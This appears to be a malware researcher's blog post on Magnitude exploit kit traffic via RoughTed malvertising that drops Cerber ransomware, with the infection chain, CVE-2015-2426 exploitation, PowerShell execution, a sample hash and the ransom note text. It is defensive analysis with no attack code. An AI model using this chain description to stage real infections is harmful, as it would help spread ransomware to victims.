Magnitude EK via RoughTed drops Cerber Ransomware


In my previous blog I found Rig EK via RoughTed malvertising operation. I saw in the MalwareBytes article that it also redirected to Magnitude EK. Curious to find it, I set my lab up for Magnitude and went to find it. It only took about 5 minutes.

I wonder what else RoughTed leads to apart from that which has been listed.

Background Information:

  • Article from RSA, although a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.

  • A few previous Magnitude EK posts from me.

Multiple Magnitude EK drops Cerber Ransomware Samples

Magnitude EK delivers Cerber

  • An article regarding RoughTed Malvertising:

Downloads (in password protected zip)

Details of infection chain:

(click to enlarge!)


Magnitude EK via RoughTed malvertising drops Cerber

Full Details:

This flow began with “RoughTed”. This is a malvertising operation reported on by MalwareBytes recently. Other than the initial starting point, everything else seemed fairly normal.

I have detailed Magnitude EK in previous posts so please refer to the “background information” section above for more info.

This time though I had a double landing page which opened in a separate window. I did only saw Powershell commands in processes for both “a.exe” an “b.exe“. I this flow, “b.exe” was downloaded successfully and ran which I have not seen before. The Scriptlet also failed to create a failed payload.

Below is a screenshot of what happens when the Flash File runs. It appears to generate a URL that is met with a 404 however another URL is requested to download a payload that exploits CVE-2015-2426 and in this case allows Magnitude to run Powershell commands which were successful.


The Cerber binary had a reasonably high number of detections:

SHA256: 60e2b83d21c39f78d1612c2f5a06a943d8b6cc51c1f4a51312b85dff414f4e76
File name: b.exe
Detection ratio: 19 / 61

I only noticed one change in this Cerber and that was the ransom note said (and no typo) “Hi, I’am CERBER RANSOMWARE :)” which I’m fairly sure I have not seen before.



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s